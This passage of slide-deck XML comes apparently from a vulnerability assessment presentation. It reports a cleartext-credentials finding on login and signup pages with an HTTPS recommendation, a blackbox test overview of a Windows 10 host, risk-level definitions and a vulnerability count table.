                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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491875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users.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281075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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642175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>make sure that every sensitive form transmits content over HTTPS.</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655" name="Google Shape;655;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7398326" y="3770811"/>
            <a:ext cx="452846" cy="374469"/>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656" name="Google Shape;656;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9422674" y="3770811"/>
            <a:ext cx="452846" cy="374469"/>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657" name="Google Shape;657;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11181806" y="3770811"/>
            <a:ext cx="452846" cy="374469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625710" y="918319"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Server Transmits Cleartext Credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Google Shape;663;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114697" y="2299063"/>
            <a:ext cx="9135292" cy="2508068"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Page : /login.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Destination Page: /userinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Page : /signup.php Destination </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Page: /secured/newuser.php</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="28545"/>
            <a:ext cx="65" cy="40011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dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="en-US" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
            </a:b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83"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Google Shape;670;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-320040" y="0"/>
            <a:ext cx="12512040" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="3970020"/>
            <a:ext cx="6877118"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rgbClr val="DDEAF6"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>VULNERABILITY ASSESSMENT ON </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="DDEAF6"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>HOST MACHINE</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84"/>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rPr lang="en-US"/>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435607"/>
            <a:ext cx="11199922" cy="4789701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TARGET: HOST MACHINE </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>OS VERSION: WINDOWS 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We performed some blackbox vulnerability tests on the host machine using automatic scanner as well as manually.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Blackbox testing aims at:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Examining a system against external factors responsible for any  weakness that could be used by an external attacker to disrupt the network’s security.	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292735" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292735" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800"/>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85"/>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rPr lang="en-US"/>
              <a:t>RISK DEFINATION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="1371600"/>
            <a:ext cx="2042160" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>HIGH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="1367028"/>
            <a:ext cx="8310880" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="323F4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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Weakness in control that represent exposure to the organization or risks that could compromise the control framework, data integrity and / or operational efficiency. These risks need to be addressed with utmost priority.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Google Shape;685;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2988886" y="2648206"/>
            <a:ext cx="8310880" cy="1209041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="8296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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Potential weakness in control, which would develop into an exposure. Or issues that represent areas of concerns and may impact controls. They should be addressed reasonably promptly.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Google Shape;686;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="2648206"/>
            <a:ext cx="2042160" cy="1209041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="BA8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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>MEDIUM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="3923794"/>
            <a:ext cx="8310880" cy="1266948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solid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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Potential weakness in controls, which in combination with other weaknesses can develop into exposure. Suggested improvements not immediately/ directly affecting controls.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="3927865"/>
            <a:ext cx="2042160" cy="1266948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="517E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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>LOW</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="693" name="Google Shape;693;p86"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="355600" y="2406226"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{B60C7370-9768-4E96-B8B1-DA89375A92FC}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2646675"/>
                <a:gridCol w="2646675"/>
              </a:tblGrid>
              <a:tr h="794175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>TYPE OF RISK</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F14167"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>NO. OF VULNERABILITIES</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F14167"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="619750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F8CFB6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="650250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>MEDIUM</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
